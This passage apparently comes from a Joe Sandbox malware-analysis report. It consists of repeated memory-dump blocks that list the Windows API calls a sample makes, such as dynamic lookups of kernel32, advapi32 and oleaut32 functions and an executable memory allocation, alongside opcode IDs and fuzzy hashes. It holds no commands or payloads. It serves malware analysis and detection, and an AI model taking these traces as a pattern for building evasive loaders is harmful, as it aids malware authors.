                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                  • String ID: RoUninitialize$combase.dll
                                                                                                                  • API String ID: 2574300362-2819208100
                                                                                                                  • Opcode ID: 17c53f01c425a871a2a7e08818407835fd5d87baba76becf89ceddd2c591b86c
                                                                                                                  • Instruction ID: d46364889646456c7861f70c69c69da101180cfb55a186b475e72934e09a41d7
                                                                                                                  • Opcode Fuzzy Hash: 17c53f01c425a871a2a7e08818407835fd5d87baba76becf89ceddd2c591b86c
                                                                                                                  • Instruction Fuzzy Hash: CEE0B670646308AFDB305F62ED1DB253A77B710712F144064F20AF21B0CBB54518EB29
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: LocalTime__swprintf
                                                                                                                  • String ID: %.3d$WIN_XPe
                                                                                                                  • API String ID: 2070861257-2409531811
                                                                                                                  • Opcode ID: 447cb6cb358f73f563a1d2272f432a3a9f38b4016aaebb489c987f8f85d06951
                                                                                                                  • Instruction ID: f459d00be2b5f002df49784ff0f46627bc2de4409f1761d8b19669c3a80e9d5c
                                                                                                                  • Opcode Fuzzy Hash: 447cb6cb358f73f563a1d2272f432a3a9f38b4016aaebb489c987f8f85d06951
                                                                                                                  • Instruction Fuzzy Hash: CAE0127180815CFACF14E692DD469BB737CAB04310F1084A3B996D2040D375EB54AF31
                                                                                                                  APIs
                                                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,00DD20EC,?,00DD22E0), ref: 00DD2104
                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00DD2116
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                  • String ID: GetProcessId$kernel32.dll
                                                                                                                  • API String ID: 2574300362-399901964
                                                                                                                  • Opcode ID: 934cf6eb447cdca8b7c43d478428d27b111a3b1a130012a533a5b86390943b8e
                                                                                                                  • Instruction ID: caf0b4289730ba226c010ad8bf76039e5c8aba0b3c9f155f8630a429c70d320f
                                                                                                                  • Opcode Fuzzy Hash: 934cf6eb447cdca8b7c43d478428d27b111a3b1a130012a533a5b86390943b8e
                                                                                                                  • Instruction Fuzzy Hash: DDD0A7744003229FD7215F60F80E62237D5AB14304B04D41EE689E1354D770C480CA30
                                                                                                                  APIs
                                                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,00D8E6D9,?,00D8E55B,00E0DC28,?,?), ref: 00D8E6F1
                                                                                                                  • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00D8E703
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                  • String ID: IsWow64Process$kernel32.dll
                                                                                                                  • API String ID: 2574300362-3024904723
                                                                                                                  • Opcode ID: f85ff71a15a2a4ec8131d02503912a64bb5d400e3722561e088b572b08189f36
                                                                                                                  • Instruction ID: 5a521468add5b646e375127fdf44c8ef70bdc95c247d92181093148ee639b053
                                                                                                                  • Opcode Fuzzy Hash: f85ff71a15a2a4ec8131d02503912a64bb5d400e3722561e088b572b08189f36
                                                                                                                  • Instruction Fuzzy Hash: 1FD0A934400322AFD7203F20FC4C6133BE9BB04308B05A42EE595E2260DBB0C880CB31
                                                                                                                  APIs
                                                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,00D8E69C,771B0AE0,00D8E5AC,00E0DC28,?,?), ref: 00D8E6B4
                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00D8E6C6
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                  • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                                  • API String ID: 2574300362-192647395
                                                                                                                  • Opcode ID: b7855e3cc1fb7ddc56f2bac12a4cd13a0329b2f1ad1fcfb3325b86f3ab9c3f78
                                                                                                                  • Instruction ID: 5d9e6e2924e273e964885c6a232d25b9fa4a8a1e5e3e15e0a208f175d39b8b12
                                                                                                                  • Opcode Fuzzy Hash: b7855e3cc1fb7ddc56f2bac12a4cd13a0329b2f1ad1fcfb3325b86f3ab9c3f78
                                                                                                                  • Instruction Fuzzy Hash: FCD0A734404322AFD7217F30F80962237D5AB24305B05A81DE555E1260E770C480EB30
                                                                                                                  APIs
                                                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,00DCEBAF,?,00DCEAAC), ref: 00DCEBC7
                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00DCEBD9
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                  • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                                                  • API String ID: 2574300362-1816364905
                                                                                                                  • Opcode ID: 0b7b0e214827fccbe009f49d95ebf9de933894006e0419c67bfc27c28a4a257a
                                                                                                                  • Instruction ID: 33943c956dc903bd8f172fff62a7e1bae5b09ca25bda384206ff50b0ec65c474
                                                                                                                  • Opcode Fuzzy Hash: 0b7b0e214827fccbe009f49d95ebf9de933894006e0419c67bfc27c28a4a257a
                                                                                                                  • Instruction Fuzzy Hash: 95D05EB44047239BD7201F30A848B2137D6AB04309B15D41DE456E3250DA70DC80C621
                                                                                                                  APIs
                                                                                                                  • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,00DB1371,?,00DB1519), ref: 00DB13B4
                                                                                                                  • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 00DB13C6
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                  • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                                                                                                                  • API String ID: 2574300362-1587604923
                                                                                                                  • Opcode ID: 02709436b1b57a583c2d79a5d5352437f52e07b4665f42b77ee9d00c48ed361f
                                                                                                                  • Instruction ID: 64b5ecf835e345fd6ddd9bfbb12011e1c018d91496c06c49c0ed8753eb521590
                                                                                                                  • Opcode Fuzzy Hash: 02709436b1b57a583c2d79a5d5352437f52e07b4665f42b77ee9d00c48ed361f
                                                                                                                  • Instruction Fuzzy Hash: 9ED0A734500322DFD7200F34F80865136EAAB40308F04941DE556E1760EE74C480CB30
                                                                                                                  APIs
                                                                                                                  • LoadLibraryA.KERNEL32(oleaut32.dll,?,00DB135F,?,00DB1440), ref: 00DB1389
                                                                                                                  • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 00DB139B
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                  • String ID: RegisterTypeLibForUser$oleaut32.dll
                                                                                                                  • API String ID: 2574300362-1071820185
                                                                                                                  • Opcode ID: 3c988fd9d480c7a2c30f16ec1cd30f4545df78c5223e01205ecaf13f8e4b101a
                                                                                                                  • Instruction ID: 71ff65536caca78559d18acae2d66793868b259e9a988164ea418ba8e70d3fc8
                                                                                                                  • Opcode Fuzzy Hash: 3c988fd9d480c7a2c30f16ec1cd30f4545df78c5223e01205ecaf13f8e4b101a
                                                                                                                  • Instruction Fuzzy Hash: 3ED0A938810322DFD7302F34F808B9636E9EF04308F088829E486E2750EAB8C884DB30
                                                                                                                  APIs
                                                                                                                  • LoadLibraryA.KERNEL32(advapi32.dll,?,00DD3AC2,?,00DD3CF7), ref: 00DD3ADA
                                                                                                                  • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00DD3AEC
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                  • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                  • API String ID: 2574300362-4033151799
                                                                                                                  • Opcode ID: e27f17d94d768e661974ca96c36a07dc1d44df4c73bb6a35f7f7bca56c873da6
                                                                                                                  • Instruction ID: 8e418a0ca0db5acac2628d6c124d8b4eaff2f7a50df53aa3a54b859609d46c8b
                                                                                                                  • Opcode Fuzzy Hash: e27f17d94d768e661974ca96c36a07dc1d44df4c73bb6a35f7f7bca56c873da6
                                                                                                                  • Instruction Fuzzy Hash: BAD0A9B06043238FD7208F20F80D65237E9AB11308B04A42AF4E6E2790EFF0C880CA32
                                                                                                                  APIs
                                                                                                                  • CharUpperBuffW.USER32(00000000,?,00000000,00000001,00000000,00000000,?,?,00000000,?,?,00DC6AA6), ref: 00D7AB2D
                                                                                                                  • _wcscmp.LIBCMT ref: 00D7AB49
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: BuffCharUpper_wcscmp
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 820872866-0
                                                                                                                  • Opcode ID: bbc25f4f32d55fa889f2a93c8cfbbdff08fc8b33fe27b1f65266d467d8ea003c
                                                                                                                  • Instruction ID: c3c133b48f07aaba3033f293e02e4bedc1f281b4772c074458c7d94398cc5480
                                                                                                                  • Opcode Fuzzy Hash: bbc25f4f32d55fa889f2a93c8cfbbdff08fc8b33fe27b1f65266d467d8ea003c
                                                                                                                  • Instruction Fuzzy Hash: 8DA1F571700106DFDB15EF69E98166DB7B1FF84310F64816AEC5A97290EB30D871C762
                                                                                                                  APIs
                                                                                                                  • CharLowerBuffW.USER32(?,?), ref: 00DD0D85
                                                                                                                  • CharLowerBuffW.USER32(?,?), ref: 00DD0DC8
                                                                                                                    • Part of subcall function 00DD0458: CharLowerBuffW.USER32(?,?,?,?), ref: 00DD0478
                                                                                                                  • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00DD0FB2
                                                                                                                  • _memmove.LIBCMT ref: 00DD0FC2
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: BuffCharLower$AllocVirtual_memmove
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3659485706-0
                                                                                                                  • Opcode ID: db659ddbfccac8dd07f299f521155e2081b352d2735a1f157a830569b76e7f20
                                                                                                                  • Instruction ID: 465239a6071f90bfffcb157566b8caeb554206622d0524ffcc77b6207c0d3c3e
                                                                                                                  • Opcode Fuzzy Hash: db659ddbfccac8dd07f299f521155e2081b352d2735a1f157a830569b76e7f20
                                                                                                                  • Instruction Fuzzy Hash: 19B182756043009FC714DF28C480A6ABBE5EF89714F18896EF889DB351EB71ED45CB62
                                                                                                                  APIs
                                                                                                                  • CoInitialize.OLE32(00000000), ref: 00DCAF56
                                                                                                                  • CoUninitialize.COMBASE ref: 00DCAF61
                                                                                                                    • Part of subcall function 00DB1050: CoCreateInstance.COMBASE(?,00000000,00000005,?,?), ref: 00DB10B8
                                                                                                                  • VariantInit.OLEAUT32(?), ref: 00DCAF6C
                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00DCB23F
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 780911581-0
                                                                                                                  • Opcode ID: 50344322931724ca2026f535600da70d25d36f52ee5a3fb338472a1e2363d0b4
                                                                                                                  • Instruction ID: 15df3345684cb45b3ab4a77b3dcc1c35f6aa836c4c2fe5437b1ca156ef84baab
                                                                                                                  • Opcode Fuzzy Hash: 50344322931724ca2026f535600da70d25d36f52ee5a3fb338472a1e2363d0b4
                                                                                                                  • Instruction Fuzzy Hash: F9A114756047029FCB10DF14C896B2AB7E5EF89364F04844DF9999B3A1DB30ED44CBA6
                                                                                                                  APIs
                                                                                                                  • _memmove.LIBCMT ref: 00D7C419
                                                                                                                  • ReadFile.KERNEL32(?,?,00010000,?,00000000,?,?,00000000,?,00DB6653,?,?,00000000), ref: 00D7C495
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FileRead_memmove
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1325644223-0
                                                                                                                  • Opcode ID: 71ff3d6f9d3ea4f5d98f2c1986a35ea52b2f3df110539e5afe26d0ee6636b707
                                                                                                                  • Instruction ID: f71f27e8ce8c05d1436271059d967ed9a5773897c90646c732199f5d645f51fa
                                                                                                                  • Opcode Fuzzy Hash: 71ff3d6f9d3ea4f5d98f2c1986a35ea52b2f3df110539e5afe26d0ee6636b707
                                                                                                                  • Instruction Fuzzy Hash: 44A1AF70A04615EFDB10DF66C8847A9FBB0FF05300F14C599E859EA241E735E961DBB1
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3877424927-0
                                                                                                                  • Opcode ID: aebda769b95e77701e436127e080a9cadaa2a4c9016d62218a8c9d4b87048a89
                                                                                                                  • Instruction ID: b8ee325aa49b1423d14681f2f85f77dadb0e04cc443cbef9fba2d989aea114b5
                                                                                                                  • Opcode Fuzzy Hash: aebda769b95e77701e436127e080a9cadaa2a4c9016d62218a8c9d4b87048a89
                                                                                                                  • Instruction Fuzzy Hash: 5D518230A003059BDF249FB98880EAE77A5EF41364F288729F875976D2D7B0DD529B70
                                                                                                                  APIs
                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00DDC354
                                                                                                                  • ScreenToClient.USER32(?,00000002), ref: 00DDC384
                                                                                                                  • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 00DDC3EA
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
